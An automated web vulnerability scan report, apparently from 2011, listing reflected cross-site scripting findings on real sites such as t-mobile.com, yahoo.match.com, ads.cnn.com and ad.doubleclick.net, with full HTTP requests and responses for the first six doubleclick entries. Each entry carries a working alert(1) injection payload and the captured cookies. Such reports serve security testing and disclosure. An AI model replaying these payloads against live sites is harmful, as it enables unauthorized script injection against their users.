1.235. http://www.t-mobile.com/Company/Working.aspx [name of an arbitrarily supplied request parameter]

1.236. http://www.t-mobile.com/business/Information.aspx [name of an arbitrarily supplied request parameter]

1.237. http://www.theroot.com/views/where-have-all-sports-heroes-gone [GT1 parameter]

1.238. http://www.theroot.com/views/where-have-all-sports-heroes-gone [REST URL parameter 1]

1.239. http://www.theroot.com/views/where-have-all-sports-heroes-gone [REST URL parameter 2]

1.240. http://www.theroot.com/views/where-have-all-sports-heroes-gone [REST URL parameter 2]

1.241. http://www.theroot.com/views/where-have-all-sports-heroes-gone [name of an arbitrarily supplied request parameter]

1.242. http://www.vxsecurityresearch.org/ [name of an arbitrarily supplied request parameter]

1.243. http://www.vxsecurityresearch.org/favicon.ico [name of an arbitrarily supplied request parameter]

1.244. http://www.zdnet.com/blog/security/obama-site-hacked-redirected-to-hillary-clinton/1042 [REST URL parameter 4]

1.245. http://yahoo.match.com/qsearch/qsearchdl.aspx [name of an arbitrarily supplied request parameter]

1.246. http://yahoo.match.com/search/searchSubmit.aspx [name of an arbitrarily supplied request parameter]

1.247. http://yahoo.match.com/search/searchSubmit.aspx [pn parameter]

1.248. http://yahoo.match.com/search/searchSubmit.aspx [pn parameter]

1.249. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

1.250. http://core.insightexpressai.com/adServer/adServerESI.aspx [Referer HTTP header]

1.251. http://melges32.com/ [User-Agent HTTP header]

1.252. http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx [User-Agent HTTP header]

1.253. http://www.t-mobile.com/shop/addons/Accessories/Default.aspx [User-Agent HTTP header]

1.254. http://www.t-mobile.com/shop/addons/Services/information.aspx [User-Agent HTTP header]

1.255. http://www.t-mobile.com/shop/phones/ [User-Agent HTTP header]

1.256. http://www.t-mobile.com/shop/phones/Default.aspx [User-Agent HTTP header]

1.257. http://www.t-mobile.com/shop/plans/Cell-Phone-Plans.aspx [User-Agent HTTP header]

1.258. http://www.zdnet.com/blog/security/obama-site-hacked-redirected-to-hillary-clinton/1042 [Referer HTTP header]

1.259. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph¶ms.styles=fs&domId=177939&page.allowcompete=yes&domId=177939 [NGUserID cookie]

1.260. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo¶ms.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197303&page.allowcompete=yes&domId=626108 [NGUserID cookie]

1.261. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=business_news&cnn_money_section=the_buzz¶ms.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=211644 [NGUserID cookie]

1.262. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz¶ms.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863 [NGUserID cookie]

1.263. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=business_news&cnn_money_section=the_buzz¶ms.styles=fs&qcseg=D&qcseg=T&qcseg=291&qcseg=446&qcseg=232&qcseg=239&qcseg=249&qcseg=2900&qcseg=1758&qcseg=756&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909197304&page.allowcompete=yes&domId=236863 [NGUserID cookie]

1.264. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=70810 [NGUserID cookie]

1.265. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=428665 [NGUserID cookie]

1.266. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=22098 [NGUserID cookie]

1.267. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&tile=1300909197303&page.allowcompete=yes&domId=187198 [NGUserID cookie]

1.268. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_interstitial&cnn_money_rollup=markets_and_stocks¶ms.styles=fs_interstitial&tile=1300909197303&page.allowcompete=yes&domId=289154 [NGUserID cookie]

1.269. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo¶ms.styles=fs&domId=686077&page.allowcompete=yes&domId=686077 [NGUserID cookie]

1.270. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes¶ms.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976 [NGUserID cookie]

1.271. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=homepage&cnn_money_section=sponsor_center¶ms.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=417888 [NGUserID cookie]

1.272. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=homepage&cnn_money_section=sponsor_center¶ms.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=25457 [NGUserID cookie]

1.273. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=homepage&cnn_money_section=sponsor_center¶ms.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=471129 [NGUserID cookie]

1.274. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=homepage&cnn_money_section=sponsor_center¶ms.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=906497 [NGUserID cookie]

1.275. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=homepage&cnn_money_section=sponsor_center¶ms.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=217296 [NGUserID cookie]

1.276. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=homepage&cnn_money_section=sponsor_center¶ms.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=757816 [NGUserID cookie]

1.277. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&cnn_money_section=business_unusual&page.allowcompete=yes¶ms.styles=html_tags%20marginheight= [NGUserID cookie]

1.278. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage&cnn_money_section=business_unusual&page.allowcompete=yes¶ms.styles=html_tags+marginheight= [NGUserID cookie]

1.279. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=336x280_rgt&cnn_money_rollup=homepage¶ms.styles=fs&bizo_ind=business_services&bizo_func=information_technology&bizo_sen=executive&tile=1300909177541&page.allowcompete=yes&domId=632100 [NGUserID cookie]

1.280. http://tag.admeld.com/ad/iframe/221/tmz/300x250/homepage_inpost [meld_sess cookie]

1.281. http://tag.admeld.com/ad/iframe/221/tmz/300x250/homepage_inpost [meld_sess cookie]

1.282. http://tag.admeld.com/ad/iframe/221/tmz/300x250/ros_inpage [meld_sess cookie]

1.283. http://tag.admeld.com/ad/iframe/221/tmz/300x250/ros_inpage [meld_sess cookie]

1.284. http://tag.admeld.com/ad/iframe/221/tmz/300x250/tremor-300x250 [meld_sess cookie]

1.285. http://tag.admeld.com/ad/iframe/221/tmz/300x250/tremor-300x250 [meld_sess cookie]

1.286. http://tag.admeld.com/ad/iframe/221/tmz/728x90/tremor-728x90 [meld_sess cookie]

1.287. http://tag.admeld.com/ad/iframe/221/tmz/728x90/tremor-728x90 [meld_sess cookie]

1.288. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [V cookie]

1.289. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [cwbh1 cookie]



1. Cross-site scripting (reflected)
There are 289 instances of this issue:


1.1. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [adurl parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.8

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba557"-alert(1)-"eed0cbd30d3 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=ba557"-alert(1)-"eed0cbd30d3 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4918
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 22 Mar 2011 22:04:50 GMT
Expires: Tue, 22 Mar 2011 22:04:50 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
NvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=ba557"-alert(1)-"eed0cbd30d3http://www.dishnetwork.com/redirects/promotion/offer22/default.aspx?utm_source=google&utm_medium=display&utm_campaign=testbooyah");
var wmode = "opaque";
var bg = "ffffff";
var dcallowscriptaccess = "n
...[SNIP]...

1.2. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.8

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f071f"-alert(1)-"586c30ab82d was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAAf071f"-alert(1)-"586c30ab82d&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=;ord=1050800391? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:04:13 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:04:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4954

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAAf071f"-alert(1)-"586c30ab82d&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay
...[SNIP]...

1.3. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.8

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80627"-alert(1)-"c043f3127fe was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-783211283734559080627"-alert(1)-"c043f3127fe&adurl=;ord=1050800391? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:04:48 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:04:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4954

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
udG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-783211283734559080627"-alert(1)-"c043f3127fe&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay%26utm_campaign%3Dtestbooyah");
var wmode = "opaque";
var bg = "ffffff";
var
...[SNIP]...

1.4. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.8

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46e2d"-alert(1)-"e00ed999199 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=146e2d"-alert(1)-"e00ed999199&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=;ord=1050800391? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:04:28 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:04:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4954

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
NrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=146e2d"-alert(1)-"e00ed999199&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay%26utm
...[SNIP]...

1.5. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.8

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2756b"-alert(1)-"b6a0b2aa765 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg2756b"-alert(1)-"b6a0b2aa765&client=ca-pub-7832112837345590&adurl=;ord=1050800391? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1300849415&flash=10.2.154&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1300831415414&bpp=4&shv=r20101117&jsv=r20110321-2&correlator=1300831415458&frm=0&adk=4257168233&ga_vid=2111348435.1300831415&ga_sid=1300831415&ga_hid=21570317&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1058&bih=995&eid=33895132&fu=0&ifi=1&dtd=65&xpc=Qc00ugmKxW&p=http%3A//www.tmz.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/1049449/15055,2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 22 Mar 2011 22:04:38 GMT
Vary: Accept-Encoding
Expires: Tue, 22 Mar 2011 22:04:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4954

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif
...[SNIP]...
AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg2756b"-alert(1)-"b6a0b2aa765&client=ca-pub-7832112837345590&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay%26utm_campaign%3Dtestbooyah");
var wmode = "
...[SNIP]...

1.6. http://ad.doubleclick.net/adi/N5315.150143.0288179548321/B5334493.8 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5315.150143.0288179548321/B5334493.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48c1c"-alert(1)-"6255ab16084 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5315.150143.0288179548321/B5334493.8;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l48c1c"-alert(1)-"6255ab16084&ai=B1yAwrRyJTeb7Hty46Aa32ZTtDNrrrI8CouXKqBq-oOWYNuCQ4QQQARgBIMuVrxM4AFCulJOBB2DJBqABpuKz6gOyAQt3d3cudG16LmNvbboBCTcyOHg5MF9hc8gBCdoBE2h0dHA6Ly93d3cudG16LmNvbS-4AhjAAgXIAvK1nBuoAwHRA1-0zbvopV3k6AO4AegD-wPoA5cE9QMAgACA9QMQAIAA&num=1&sig=AGiWqtzL6xobC9qke7iU3TnLyUqOEYt4Zg&client=ca-pub-7832112837345590&adurl=;ord=1050800391? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
